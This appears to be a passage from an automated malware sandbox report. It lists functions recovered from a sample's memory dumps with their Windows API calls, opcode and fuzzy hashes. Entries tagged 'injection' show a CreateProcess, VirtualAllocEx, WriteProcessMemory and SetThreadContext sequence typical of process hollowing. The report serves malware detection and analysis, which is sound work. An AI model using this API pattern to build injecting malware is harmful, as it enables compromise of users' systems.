                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 92734dbc20e16c77bf9972883c3adf59a79449e032e4a54aa2ebc5781752d641
                                  • Instruction ID: 360d2f95a84d41f467d56e682860bf970a378dd3381ac31d1d2b621cffe2bc93
                                  • Opcode Fuzzy Hash: 92734dbc20e16c77bf9972883c3adf59a79449e032e4a54aa2ebc5781752d641
                                  • Instruction Fuzzy Hash: C8C1F570A21245EFC704EFA8E58999DFBF2FF48755B14C86AE005EB264EB349942CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD1524, Relevance: .3, Instructions: 256COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 36bfba3a674f54b51b2efa0e15f64f0801845e4f20ab9a69141ffb72d02f01ae
                                  • Instruction ID: 1605e4ada6a5df683f65898813e912fad41eb0bf73c270ec7fb34ab03208c753
                                  • Opcode Fuzzy Hash: 36bfba3a674f54b51b2efa0e15f64f0801845e4f20ab9a69141ffb72d02f01ae
                                  • Instruction Fuzzy Hash: F5C1F770A21245EFC704EFA8E58999DFBF2FB48755B14C86AE005DB364EB34A942CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD5B90, Relevance: .2, Instructions: 170COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 29b2d84158fa7466fb01bb72f38729bd01c8643bb8aa4b5b96bd3de2208b93d8
                                  • Instruction ID: aa1214d24be6a9df228b36d14f7cbacc1f014ae6f3b7fc8e1de0b48227d2f9ca
                                  • Opcode Fuzzy Hash: 29b2d84158fa7466fb01bb72f38729bd01c8643bb8aa4b5b96bd3de2208b93d8
                                  • Instruction Fuzzy Hash: 49713871E5462A8BDB28CF66CD44BA9F7F6EF98300F1081E6950DA7654EB305A819F40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD5918, Relevance: .2, Instructions: 161COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e102368901c99edc5446a5ae3ee22c1ab911a4360a993c1529311b4088f8594e
                                  • Instruction ID: f94b5c83845c4f3e1fe0306cd8f642c964d0e7d74a62c8c48e8399365ca05ff2
                                  • Opcode Fuzzy Hash: e102368901c99edc5446a5ae3ee22c1ab911a4360a993c1529311b4088f8594e
                                  • Instruction Fuzzy Hash: 4A515874D0AA18DBCB24CFA5E5806EDFBF6AF89310F20A16BE006B7354E73499419B14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD5908, Relevance: .2, Instructions: 158COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8847557fc3f9511dd151890bb96a9801d1c13f5fa0d5bee1927c0c61a5415d8b
                                  • Instruction ID: 656aee26fed0fa996ea685b1b1f556b3b578859f9ba215cae06d126888129b77
                                  • Opcode Fuzzy Hash: 8847557fc3f9511dd151890bb96a9801d1c13f5fa0d5bee1927c0c61a5415d8b
                                  • Instruction Fuzzy Hash: 63517974D0AA18DBCB14CFA5E5806EDFBF6AF89310F24A16BE005BB354E7348945CB14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD5B8C, Relevance: .1, Instructions: 135COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5f396d497be32f1fe8ea425898558500231ea0cc6e21beb3ac6abdf09f7eea86
                                  • Instruction ID: bea7621beafad2c237d1ef52d043a6ae5adae46d409f3b0dd6c29db0729c433c
                                  • Opcode Fuzzy Hash: 5f396d497be32f1fe8ea425898558500231ea0cc6e21beb3ac6abdf09f7eea86
                                  • Instruction Fuzzy Hash: 1B512871E51A1A8BDB68CF66CD44B99F7F2EFD8300F1482EA950DA7254EB705AC18F40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0279B690, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0279B6F0
                                  • GetCurrentThread.KERNEL32 ref: 0279B72D
                                  • GetCurrentProcess.KERNEL32 ref: 0279B76A
                                  • GetCurrentThreadId.KERNEL32 ref: 0279B7C3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: a5c6e10de2a9636dc56dadbce602c23f241072e20cd5fe574453017e39002872
                                  • Instruction ID: cbbc538b6d3fb626db927d38eadd8db21a3a89310a4597f2524f1236ccdaa48a
                                  • Opcode Fuzzy Hash: a5c6e10de2a9636dc56dadbce602c23f241072e20cd5fe574453017e39002872
                                  • Instruction Fuzzy Hash: 425164B49007498FDB10DFAAE588BDEBBF0EF48318F24855AE409A3350CB74A844CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0279B68F, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0279B6F0
                                  • GetCurrentThread.KERNEL32 ref: 0279B72D
                                  • GetCurrentProcess.KERNEL32 ref: 0279B76A
                                  • GetCurrentThreadId.KERNEL32 ref: 0279B7C3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: ec6b1ecd5782ae65356d4602ee14eb765599b7460e06367b23410a7b836d9f23
                                  • Instruction ID: 30507d3a9fa267fec0e3c573fc2404e7cc739f28081f350f0ca6b877f6d9d04d
                                  • Opcode Fuzzy Hash: ec6b1ecd5782ae65356d4602ee14eb765599b7460e06367b23410a7b836d9f23
                                  • Instruction Fuzzy Hash: 005164B49007498FDB10DFA9E588BDEBBF0EF48318F24855AE419A7350CB74A944CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0279FBEB, Relevance: 1.7, APIs: 1, Instructions: 227COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5c045bb67076a4093882a35b8de36b0dff905b134a02e4cbdf74ecf04046f357
                                  • Instruction ID: d63b5b7b29e53ef401e7d24ca22e0c42bd2c3057356a82c22497294305f69273
                                  • Opcode Fuzzy Hash: 5c045bb67076a4093882a35b8de36b0dff905b134a02e4cbdf74ecf04046f357
                                  • Instruction Fuzzy Hash: BC814C71D09388AFDF06CFA4D8559CDBFB1EF0A314F19819AE844EB262D334994ACB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02799490, Relevance: 1.7, APIs: 1, Instructions: 173libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02799951,00000800,00000000,00000000), ref: 02799B62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 516169a830023dadd106d1de14a8654bc950ea17b70d907b1dba79030b326baf
                                  • Instruction ID: 497fe9f37078d9c8ee59ed5acfb576a713e1b9d0e81f21c05db4fe95efd238ef
                                  • Opcode Fuzzy Hash: 516169a830023dadd106d1de14a8654bc950ea17b70d907b1dba79030b326baf
                                  • Instruction Fuzzy Hash: C66166B1D00718DFEB10CFA9D8847DEBBF4EB49314F10812EE915A7240C778A446CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD7174, Relevance: 1.6, APIs: 1, Instructions: 148processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 00BD72D3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 2d3efd8f565705088283bfc32272d8cced94f089293e9cd80b5859896415bc4b
                                  • Instruction ID: be5646965a754a9b2f792be91589c4c1a1c0a2722f47c8905ac453f76f061d8e
                                  • Opcode Fuzzy Hash: 2d3efd8f565705088283bfc32272d8cced94f089293e9cd80b5859896415bc4b
                                  • Instruction Fuzzy Hash: C9510671D04369DFDB50CF99C880BDDBBB1BF49314F15809AE908A7250DB749A89CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD0EDC, Relevance: 1.6, APIs: 1, Instructions: 146processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 00BD72D3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: da15255d7cda0b23d0a6b5bfea9110d9d304b0e824a13cd920f4be3a455a3dd5
                                  • Instruction ID: a4165515d5d7e7d6a43ef217c6d3387c9f8fc78dcf346c7fc884776ab78472de
                                  • Opcode Fuzzy Hash: da15255d7cda0b23d0a6b5bfea9110d9d304b0e824a13cd920f4be3a455a3dd5
                                  • Instruction Fuzzy Hash: 55510471D04329DFDB60CF9AC880BDDBBB1AF49314F15809AE908A7250EB749A89CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0279FCF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0279FE0A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 569c1545b8dd164790bb6ece91bda991c7774261327f003415456ef7440cfa8f
                                  • Instruction ID: 260e6880ebbc72621d8299e6b91114013e791181afafdb3a57e52cc65aae595f
                                  • Opcode Fuzzy Hash: 569c1545b8dd164790bb6ece91bda991c7774261327f003415456ef7440cfa8f
                                  • Instruction Fuzzy Hash: 8C41CFB1D103099FDF14CFA9D884ADEFBB5BF88314F24812AE819AB214D774A945CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02795365, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6eba867295bbaaec99632131e74edd703b738d38721dd4513c4c4fe49f8e1bda
                                  • Instruction ID: bfb70fbe9d7c4f270aa7d1137ee6efeb4905bb8eb9b17c329b920242a4052f01
                                  • Opcode Fuzzy Hash: 6eba867295bbaaec99632131e74edd703b738d38721dd4513c4c4fe49f8e1bda
                                  • Instruction Fuzzy Hash: AD410270D00728CBDF25CFA9D84479DBBB1BF48309F65806AD408BB250DB756946CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02793DE8, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 02795421
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: e3bb4a4b689c02c85499ec5a74b73ac59ef47a84a62b78a6a70939e02cd7c814
                                  • Instruction ID: 6e138d2d721a34afb9054d8abfb17378fec6f890843865b487e7fcd3f802d593
                                  • Opcode Fuzzy Hash: e3bb4a4b689c02c85499ec5a74b73ac59ef47a84a62b78a6a70939e02cd7c814
                                  • Instruction Fuzzy Hash: 0041E070C04728CBDB24CFAAC844B9EBBF5BF49309F658069D508BB251DB75A945CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02799AF0, Relevance: 1.6, APIs: 1, Instructions: 83libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02799951,00000800,00000000,00000000), ref: 02799B62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 5c099ae4cb079bec64213aab31b7b7a8120f4d35769597db4b0ad10129a6702c
                                  • Instruction ID: 475a5f23341157ea33e2965be3805ac25e572473c5438b9abeadc8a982c20e53
                                  • Opcode Fuzzy Hash: 5c099ae4cb079bec64213aab31b7b7a8120f4d35769597db4b0ad10129a6702c
                                  • Instruction Fuzzy Hash: AC3156B6800348DFDF14CF99E448ADEFBB4EB88320F14855ED515AB600C778A90ACFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD7721, Relevance: 1.6, APIs: 1, Instructions: 67injectionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00BD77B5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 6b7f52f60e14b19cbc183ae10801b06d0ada9ae22445c63e64ec10c152b8c80b
                                  • Instruction ID: 7ecf870d080888a0974e0bfb6981f2e645fcc37b30f81f3cc46023be0b0ef15c
                                  • Opcode Fuzzy Hash: 6b7f52f60e14b19cbc183ae10801b06d0ada9ae22445c63e64ec10c152b8c80b
                                  • Instruction Fuzzy Hash: 4821F4B59012499FCB10CFA9D885BDEBBF4FB48310F14846AE958A7350D778A944CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD7728, Relevance: 1.6, APIs: 1, Instructions: 65injectionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00BD77B5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: a3c04018397fd0063f4b6c7fd7e29bf3a0267108d33bdcc39d26468d07b992d9
                                  • Instruction ID: 56aceb37bb04f1f41f711e58b6f7af55aa7a0a71f5c9ba69255fae7de43b3cbc
                                  • Opcode Fuzzy Hash: a3c04018397fd0063f4b6c7fd7e29bf3a0267108d33bdcc39d26468d07b992d9
                                  • Instruction Fuzzy Hash: 952103B59002499FCB10CF9AC885BDEFBF4FB48310F10842AE918A3350E778A944CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0279B8B8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0279B93F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 22e94a0cd7051055797daef797fc47ddaf36fbedf36332e2d47abef6e9ff76c7
                                  • Instruction ID: 740955ca588817e235494ab7ab911dcd0c70b2fab80a101e011a4b67efb54ca6
                                  • Opcode Fuzzy Hash: 22e94a0cd7051055797daef797fc47ddaf36fbedf36332e2d47abef6e9ff76c7
                                  • Instruction Fuzzy Hash: 8621E4B59002599FDB10CFA9E984ADEFBF8EB48324F14801AE954B7310D778A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0279B8B0, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0279B93F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: d070a5eb7a40593b7c0fc9a6e04bacc114ef215e8b37a86b379fbcd715a782b6
                                  • Instruction ID: 6d5ca4f3d38400037fb7f43ad915fc35cf7080940132c124658e5ece8cf7975f
                                  • Opcode Fuzzy Hash: d070a5eb7a40593b7c0fc9a6e04bacc114ef215e8b37a86b379fbcd715a782b6
                                  • Instruction Fuzzy Hash: 0721FFB5900249DFDB00CFA9E584AEEBBF5AB48324F14801AE954A3250C778AA54CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD75A8, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00BD762F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 115e74a5193dcbc03d4ad5bd4a83348590e5e4509ca1f67914724d67a8c892ce
                                  • Instruction ID: 6ea5dff12df741a44da4c1e0294e5983c897ae48fa09f5e5412822cc65280271
                                  • Opcode Fuzzy Hash: 115e74a5193dcbc03d4ad5bd4a83348590e5e4509ca1f67914724d67a8c892ce
                                  • Instruction Fuzzy Hash: D721F5B19006499FCB10CF99D884BDEFBF4FF48324F54842AE958A7251E774A544CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD74E8, Relevance: 1.6, APIs: 1, Instructions: 59threadinjectionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SetThreadContext.KERNELBASE(?,00000000), ref: 00BD7567
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: ContextThread
                                  • String ID:
                                  • API String ID: 1591575202-0
                                  • Opcode ID: 2e2ccce1cf38efecda60159151e6eaa01b95adde5c6cc948ddae75dc16b3a181
                                  • Instruction ID: 04cefdb04eb90c6dc25babcad5a7bd301541d7c823d0e4d5562cf5f82bf51111
                                  • Opcode Fuzzy Hash: 2e2ccce1cf38efecda60159151e6eaa01b95adde5c6cc948ddae75dc16b3a181
                                  • Instruction Fuzzy Hash: 222132B1D0025A8FCB00CFAAD4857EEFBB4AB08214F14816AD418B7341E778A9448FA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD75B0, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00BD762F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: efbcb6a573cbbb1e24a91f030991c543bad487f669b55688200ed654634f989b
                                  • Instruction ID: 44b5957f084e3ee20c8ed986626d1b77603adab7d5e6d340d2288bffad129bd8
                                  • Opcode Fuzzy Hash: efbcb6a573cbbb1e24a91f030991c543bad487f669b55688200ed654634f989b
                                  • Instruction Fuzzy Hash: D52104B19006499FCB10CF9AC884BDEFBF4FB48310F54842AE918A3350E778A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD74F0, Relevance: 1.6, APIs: 1, Instructions: 58threadinjectionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SetThreadContext.KERNELBASE(?,00000000), ref: 00BD7567
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: ContextThread
                                  • String ID:
                                  • API String ID: 1591575202-0
                                  • Opcode ID: e247edb86883286955ceefcf08b25b594940fe3836bb9dabce9d2296cfadc804
                                  • Instruction ID: 83d72db66324da6444bf75b9592d556d84e2bfa5f5597420d1a488b31493266e
                                  • Opcode Fuzzy Hash: e247edb86883286955ceefcf08b25b594940fe3836bb9dabce9d2296cfadc804
                                  • Instruction Fuzzy Hash: 4E21F771D1065A9BCB10CF9AD4457DEFBF4FB48214F54816AD418B3740E778A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02799478, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02799951,00000800,00000000,00000000), ref: 02799B62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 0e201592fbb508b3c0fba4738fa89ad56636b9a47df0aa9b46fbbf318dc9aa5c
                                  • Instruction ID: 3409926c2fe3aaabf81033ed6acb6d2c2b0e77a07f888e31421dfc5c61dd59b1
                                  • Opcode Fuzzy Hash: 0e201592fbb508b3c0fba4738fa89ad56636b9a47df0aa9b46fbbf318dc9aa5c
                                  • Instruction Fuzzy Hash: 2411F2B29003499BEB10CF9AD444AEEFBF4EB88224F14842EE515B7600C778A545CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02799869, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 027998D6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: a2e83f77a65083f352bc37619f3b6a70c97222af24d1bb4238fbaf9874cfdb16
                                  • Instruction ID: 7234280896a326f9943265ec344cdccca50406b2408e3de77e8221344fbce2d1
                                  • Opcode Fuzzy Hash: a2e83f77a65083f352bc37619f3b6a70c97222af24d1bb4238fbaf9874cfdb16
                                  • Instruction Fuzzy Hash: 89111FB5C003499BEB10CF9AD444ADEFBF8AB88224F14802AD859B7600C378A546CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD7678, Relevance: 1.5, APIs: 1, Instructions: 49memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00BD76EB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: d54815dfea059941bd4b23df36f31de9e9e892a0534561e53b35e6dbe05f3a40
                                  • Instruction ID: fdde42fb1644188b428cffb6755fb4946244f0f4bbd9f248dadcd18b69953a56
                                  • Opcode Fuzzy Hash: d54815dfea059941bd4b23df36f31de9e9e892a0534561e53b35e6dbe05f3a40
                                  • Instruction Fuzzy Hash: E01134B5800648DFCB10CF99C884BDEBFF8AF48310F24845AE528A7250D774A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD7680, Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00BD76EB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 52339bc65eefb7dace2c2c1ed3d87df7b41aeb39e6f387d63df2c8c5ab0e3fc5
                                  • Instruction ID: 2f3b5622a619b2c76e6a8cb47a7faa869ecd23e9fe49d099c1ec2b4563c0a60a
                                  • Opcode Fuzzy Hash: 52339bc65eefb7dace2c2c1ed3d87df7b41aeb39e6f387d63df2c8c5ab0e3fc5
                                  • Instruction Fuzzy Hash: C111E3B59006499FCB10CF9AD884BDEFBF4FB48324F24841AE528A7250D775A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02799870, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 027998D6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 8f6cb1f58677b38c985db388ba7d5a65899672a53eebe41385238b8f27727baa
                                  • Instruction ID: 5e6a29f7a6fbf25f01599120df1ddb14bc54d768a44c61dc04fcf18f5dfb8283
                                  • Opcode Fuzzy Hash: 8f6cb1f58677b38c985db388ba7d5a65899672a53eebe41385238b8f27727baa
                                  • Instruction Fuzzy Hash: 6711F0B1C007498BDB10CF9AD444ADEFBF4AB88224F14842ED519B7600C378A545CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD0FD0, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 00BD8225
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 48c30fa4a22ac68cbe7f45a2ab1c3b499f5019b4ed0d8262e1573067bcbf4394
                                  • Instruction ID: d3cadbc88c550808bfa261b4922f50fc6c68f1e868a8ef118f6a23aa9b6f4ee9
                                  • Opcode Fuzzy Hash: 48c30fa4a22ac68cbe7f45a2ab1c3b499f5019b4ed0d8262e1573067bcbf4394
                                  • Instruction Fuzzy Hash: 5E11E0B58006499FDB10CF9AD884BDEFBF8EB48324F14845AE954A7700D774A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD81C1, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 00BD8225
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 1ba4d7e20213cbf591871648291fdfced588d94fef69482c3c406c79c669806e
                                  • Instruction ID: 00c4bf25ec3b0751b4eec200c9fd9f4981854f5a9febc52ff7eb47fcc4d83e23
                                  • Opcode Fuzzy Hash: 1ba4d7e20213cbf591871648291fdfced588d94fef69482c3c406c79c669806e
                                  • Instruction Fuzzy Hash: 4211F2B68006499FDB10CF99D984BDEFBF4EB58324F14844AE554A7710D378A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0279FF40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetWindowLongW.USER32(?,?,?), ref: 0279FF9D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
